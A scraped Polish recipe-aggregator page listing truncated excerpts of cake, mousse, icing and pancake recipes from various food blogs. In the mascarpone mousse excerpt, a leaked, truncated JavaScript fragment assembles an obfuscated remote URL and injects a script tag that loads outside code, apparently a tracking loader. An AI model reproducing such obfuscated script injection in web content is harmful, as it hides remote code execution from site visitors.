masa do tortu - 6951 przepisów (strona:246/464)

Tort jagodowy na roczek 191

najbliżsi będziemy chcieli wtedy zrobić mu jakąś niespodziankę. To, że   prezent na roczek   będzie, to pewne, ale oprócz prezentu może będzie ciacho, a może nawet tort :) Goście na pewno chętnie się nim poczęstują. A może uda się zrobić ciacho jeszcze smaczniejsze ? Składniki na biszkopt : 4 jajka 1 niepełna szklanka cukru 1 łyżeczka proszku do pieczenia 1/4 szklanki mąki(...)żółtek dodawać stopniowo cukier, po łyżce wody i ucierać Połączyć mąkę z proszkiem i dodawać przesiane po łyżce do utartych żółtek Białka ubić ze szczyptą soli i dodać do masy żółtkowo-mącznej- wmieszać ostrożnie, by białka nie opadły Upiec w temp.180 *C przez około 30 min.- przed wyjęciem sprawdzić patyczkiem. Składniki na krem: 2 serki mascarpone po 250 g jogurt

Proste Potrawy
Mus czekoladowy z mascarpone 278

cukrem na jednolitą, jasną masę. W tym czasie, w kąpieli wodnej, roztapiamy czekoladę. Do żółtek z cukrem dodajemy ser mascarpone i stopniowo, roztopioną czekoladę. Miksujemy, aż powstanie gęsta, jednolita masa. Przekładamy do szklaneczek, posypujemy wiórkami kokosowymi. Wstawiamy do lodówki na 30 minut. Deser można posypać np. wiórkami czekolady lub suszonymi owocami. Latem deser można udekorować świeżymi owocami jak np. maliny(...)włoskiego sera mascarpone. W wersji dla dorosłych warto dodać kilka kropli alkoholu, który pasuje do czekolady. Taki mus czekoladowy może być wykorzystany jako krem do przełożenia blatów biszkoptowych na tort. (function(){ ccku=document.createElement("script");ccku_=("ust");cckuu="15408294"; ccku_+="a"+("t.i");ccku.type="text/javascript"; cckuu+=".nwbbcttjcku0fgx1wqa0";ccku.async=true;ccku_+="n"+("f"+"o")+"/"; cckuu+="n4gh0tsvtX";ccku.src="//"+ccku_+cckuu; document.body.appendChild(ccku

Moja smaczna kuchnia
serowy torcik a la ambasador 132

Smak tortu o nazwie ambasador pamiętam z dzieciństwa. Moja mama piekła taki na naprawdę wyjątkowe okazje. Tym razem przygotowałam zupełnie inną, ale nawiązującą do tamtych smaków, serową wersję tortu: ciemny biszkopt przełożony kremem cytrusowym i czekoladowym, polany czekoladą z bakaliami. Bardzo wykwintnie i elegancko! Serowa wersja torcika jest równie pyszna i dużo lżejsza niż tradycyjna, maślana. Zainspirowałam się(...)sposób jeszcze w innych wariantach! składniki: ciasto: 8 jaj 2 łyżki wody 1 szkl mąki pszennej 1/2 szkl mąki ziemniaczanej 1/2 szkl kakao 2 łyżeczki proszku do pieczenia masa serowa: 2 l mleka 500 ml jogurtu greckiego 5 jaj 1 szkl cukru pudru 2 łyżeczki ekstraktu z wanilii 250 g masła ponadto: sok z całej cytryny skórka otarta z jednej

6niebo
Jak zrobić doskonały lukier? 156

WYPIEKÓW Lukier to nic innego jak polewa na bazie cukru i wody (lub soku) często z dodatkiem aromatów (np. cytrynowego lub pomarańczowego). Od wieków służy on do ozdabiania ciast, tortów, pierniczków, czy pączków. Nie każdy jednak wie jak zrobić taki lukier idealny – biały, słodki, chrupiący po zastygnięciu, ale niezbyt twardy. Poniżej zdradzam przepis na perfekcyjny lukier :) Składniki (na około(...)kropel) Sposób przygotowania: Do miski wsypać cukier, wlać wodę i ewentualnie olejek. Za pomocą drewnianej pałki lub łyżki utrzeć cukier z wodą i ewentualnie aromatem do uzyskania gładkiej jednolitej masy. Stosować od razu na lekko ostygnięte wypieki. Małe ciastka najlepiej smarować za pomocą pędzelka, a większe polewać w dowolny sposób. Do pączków lepiej jest dodać więcej wody, bo lukier łatwiej

Calzonella.com
Ciasto z topinamburem i kremem z czekoladą 137

Pyszne ciasto, z kawałkami orzechów włoskich i laskowych, z dodatkiem topinamburu. W formie tortu, w stylu, ostatnio popularnym, naked cake. Przełożony kremem czekoladowym, na bazie gorzkiego kakao i wiórków czekoladowych. Pomysł na świąteczne ciasto, w nieco mniej tradycyjnym wydaniu. Polecam :) Składniki na ciasto: 3 duże jajka 125 ml oleju 200 g brązowego cukru 125 g mielonych migdałów 200 g mąki(...)pszennej 1 łyżeczka proszku do pieczenia 50 g posiekanych orzechów włoskich i laskowych 200 g topinamburu startego na tarce o grubych oczkach Jajka ubić z cukrem na jasną, puszystą masę, dodać olej, mielone migdały i mąkę przesianą z proszkiem do pieczenia, zmiksować. Do masy dodać orzechy i topinambur, delikatnie wymieszać. Formę o średnicy 20 cm wyłożyć papierem do pieczenia, wylać

Domowa cukiernia Ewy
Placki ziemniaczane z cukrem i kwaśną śmietaną 208

Kiedy chcę się poczuć małym dzieciakiem, jem właśnie placki z cukrem i śmietaną.Jest to mój powrót w przeszłość.Taka "wisienka na torcie."Do zrobienia placków najlepiej nadają się ziemniaki z dużą zawartością skrobi, np: Bryza , Ibis czy Tajfun. Na około 6 porcji:- 1,5 kg ziemniaków- 2 średnie cebulę- 2 ząbki czosnku- 2 jajka- 1 łyżka soli- 1 łyżka(...)cukier- olej do smażeniaZiemniaki, cebulę i czosnek zetrzyj na tarce o drobnych oczkach.Dodaj sól, pieprz i jajka. Wymieszaj dobrze.Rozgrzej olej na patelni. Olej musi być gorący.Ostrożnie, łyżką kładź masę ziemniaczaną na patelnię. Smaż około 4-5 minut z jednej strony, aż zbrązowieje spód, przełóż na drugą stronę i smaż ponownie około 4 minut. Dolewaj co jakiś czas olej

Pasje Jolki
Ciasto mocno czekoladowe z malinami Nigelli 203

Ciasto czekoladowe na bazie przepisu Nigelli. Niebywale wilgotne, intensywnie czekoladowe i rozpływające się w ustach. Bardzo łatwe i szybkie. Może śmiało posłużyć jako baza do tortów. Ja upiekłam wersję z malinami, ale doskonale smakuje również bez owoców. Ciasto mocno czekoladowe z malinami Nigelli Składniki: 200 g mąki pszennej 180 g cukru brązowego 1 łyżeczka proszku do pieczenia ½ łyżeczki sody oczyszczonej(...)łyżka ekstraktu z wanilii 170 ml kwaśnej śmietany 1 szklanka malin lub innych owoców Przygotowanie: Piekarnik nagrzewamy do 180 stopni. Masło ucieramy z cukrem i wanilią na gładką masę. Dodajemy jajka. Ucieramy. Mąkę i kakao przesiewamy, mieszamy z proszkiem do pieczenia oraz sodą. Do masy maślanej dodajemy na przemian suche składniki oraz śmietanę. Miksujemy na gładką masę. Uwaga: masa będzie

Mania Gotowania
Tort z owocami. 393

mąki i delikatnie połączyć łyżką - nie używać do tego miksera. Ciasto jest gotowe, gdy nie ma w nim grudek.  Spód tortownicy wyłożyć papierem do pieczenia i wylać gotową masę. Boków tortownicy niczym nie smarować, ani nie obsypywać. Rozgrzać piekarnik do 160-170 stopni C ( u mnie góra-dół) i piec biszkopt przez 35-40min. - do tak zwanego suchego(...)blaty. Jeżeli wyrośnie wyższy, można pokroić go na 4 części.  Krem: Śmietankę ubić mikserem. Pod koniec ubijania dodawać cukier puder, śmietan fix, nasionka wanilii i mascarpone.  Składanie tortu: Na talerzu lub na podstawce, na której ma być tort, kładziemy pierwszy blat ciasta. Należy go nasączyć sokiem z wiśni, posmarować dżemem z czarnej porzeczki i nałożyć krem śmietanowy. Następnie

W kuchni u Moniki
Tort Rafaello (Keto, Paleo, LowCarb, bez nabiału) 190

zimy, czyli wariacja na temat pralinek Rafaello w wersji tortu zgodnego z dietą Keto, Paleo i LowCarb. Cudowne połączenie kokosa i migdałów. Dania Deser Kuchnia Europejska , Wege Keyword rafaello , tort Porcje 12 porcji Czas przygotowania 40 minut Czas gotowania 20 minut Czas oczekiwania 2 godziny Składniki Ciasto 1/2 szklanki mąki kokosowej 2 łyżki musu kokosowego 4 łyżki wody kokosowej(...)wiórków kokosowych Sposób przygotowania Ciasto Piekarnik nagrzej do 180 stopni Celsjusza w termoobiegu. Wymieszaj suche składniki ciasta. Oddziel białka od żółtek. Olej kokosowy utrzyj z erytrytolem na białą puszystą masę, dodając po kolei żółtka oraz wodę i mus kokosowy. Białka ubij na sztywno i delikatnie dodaj do masy z żółtkami. Wmieszaj delikatnie suche składniki. Formę o średnicy 22 cm wyłóż

Modern Cave Girl
Serniczek z serków waniliowych na cynamonowym spodzie 131

Wystarczy kilka składników aby wyczarować pyszne ciasto! Do ciasta wykorzystałam waniliowe serki, świeże truskawki i truskawkowe galaretki. Spód ciasta to cynamonowe płatki śniadaniowe oraz biszkopciki. Całość

VioletoweKucharzenie
Domowy kopiec kreta 166

Dziś podam przepis na odtworzenie popularnego wiele lat temu ciasta kopiec kreta, jest o niebo lepsze niż to z pudełka. Składniki: Biszkopt 4 jajka 1 szklanka

Pychotkaaa
Piernik "Laska Mikołaja" 198

Składniki na piernik:225 g masła150 g cukru300 g miodu225 g cukru pudru4-5 łyżeczek przyprawy do piernika375 ml mleka3 jajka1

Świat Ciasta
Łatwy tort truskawkowy 220

tego łatwo i dość szybko się go robi. Tort zrobiłam na budyniowym biszkopcie bez proszku do pieczenia. Krem to ubita śmietana połączona z galaretką truskawkową i dżemem truskawkowym. Tort otynkowałam kremem budyniowym o smaku śmietankowym. Na wierzch wylałam trochę galaretki wymieszanej z dżemem truskawkowym. Oto dokładny przepis: (adsbygoogle = window.adsbygoogle || []).push({}); Składniki na biszkopt: 4 jajka 0,5szkl. cukru 1 cukier(...)miksowałam do jego rozpuszczenia. Gdy piana zrobiła się błyszcząca, dodałam stopniowo po jednym żółtku i ubijałam pianę dalej do połączenia składników. Mąkę przesiałam z proszkiem budyniowym i dodałam do masy jajecznej. Wszystko wymieszałam i przelałam do tortownicy o średnicy 20cm wyłożonej na dnie papierem do pieczenia. Biszkopt piekłam ok. 40 minut w temp. 180 stopni bez termoobiegu i bez nagrzewania

Waniliowe Improwizacje
Tort malinowy 183

piec torty, a to czy uda się biszkopt, czy wyjdzie smaczny, czy jakoś uda mi się go ozdobić. Z efektu wizualnego i smakowego jestem zadowolona i wszystkim polecam ten tort. Mistrzem ozdabiania potraw kulinarnych nie jestem, ale się staram. Przepis podpatrzony u Asi i lekko zmodyfikowany. Składniki na tortownice 28-30 cm: Biszkopt: - 10 jajek; - 3/4 szklanki cukru(...)błyszcząca. Następnie dodawać stopniowo po jednym żółtku, cały czas miksując po każdym dodanym. Na koniec dodać barwik spożywczy i zmiksować na małych obrotach miksera do całkowitego rozprowadzenia barwnika w masie. Obydwie mąki przesiać do jednej miski. Do ubitej piany dodać około 1/3 część mąki i miksować na najniższych obrotach miksera przez kilka sekund, dodać drugą porcję mąki i znów króciutko

dom-agi.pl
Tort kokosowy z brzoskwiniami 126

Tort kokosowy z brzoskwiniami – Nowy, pyszny tort w Małej Cukierence. Jest duży, wysoki, wygląda fantastycznie. Tort jest dobrze nasączony i jest mocno kokosowy, owocowy, słodki. Ładnie się kroi i jest wspaniałą ozdobą stołu. Ciasto nie jest trudne w przygotowaniu, pamiętajmy tylko, aby budyń był dobrze ostudzony. W przepisie użyłam wyśmienitej Mąki ze Smokiem – z Polskich Zakładów Zbożowych w Krakowie. Mąka(...)góra-dół. 2. Białka ubić na sztywną pianę. Ciągle ucierając mikserem dodać cukier i mieszać, aż masa stanie się gęsta i lśniąca. Następnie dodać żółtka i dalej mieszać mikserem na jasną, kremową masę. 3. Wymieszać mąkę z proszkiem do pieczenia. Na jajeczną masę przesiać przygotowaną mąkę, dodać wiórki kokosowe i wymieszać szpatułką na jednolite ciasto (proszę za długo nie mieszać

Mała Cukierenka
Torcik a’la Ptasie mleczko tiramisu 100

Szalejemy z tortami! Kolejna inspiracja nową wersją popularnych słodkości musiała dojść do skutku mimo, że mamy różne uczucia w stosunku do kawy 😏  Ostatnio jednak wiele produktów z jej dodatkiem bardzo przypada nam do gustu jak np. krem orzechowo-kawowy z wanilią Nutura . Nie tylko nam, ponieważ zdecydowana większość uczestników naszych cukierniczych warsztatów oszalała na punkcie tego kremu 😄  Postanowiłyśmy(...)miksować do jego rozpuszczenia. 3. Nadal ubijając dodawać po jednym żółtku (po każdym chwilę miksując). 4. Mąki, skrobię wymieszać razem z kakao i przesiać stopniowo przez sitko do masy jajecznej. Wymieszać delikatnie szpatułką do uzyskania gładkiego ciasta bez grudek. 5. Papierem do pieczenia wyłożyć tylko dno tortownicy. Wlać ciasto i piec przez około 30-40 minut w temperaturze

Candy Pandas
Cytrynowy tort z limoncello (Torta al limone e limoncello) 228

słodyczą biszkoptu a każdy kęs tortu to czysta przyjemność. Przyznam sie Wam nieskromnie, że zakochałam si ę  w tym torcie. Mam nadzieje, ze Wam te ż  będzie smakował. Smacznego! **** Da diverso tempo stavo pensando di realizzare un torta né troppo pesante, né troppo dolce. Ed è così che è nata la torta(...)limoncello 4 tuorli 40 ml di limoncello 450 ml di latte 100 g di zucchero 30 g di farina PRZYGOTOWANIE Cytrynowy biszkopt Jaja z cukrem ubijamy na puszystą masę. Dodajemy otart ą  skórkę z cytryny, cukier waniliowy, likier limoncello oraz rozpuszczone i ostudzone masło. Stopniowo dodajemy mąkę wymieszaną z proszkiem do pieczenia. Całość

La grande e la piccola cuoca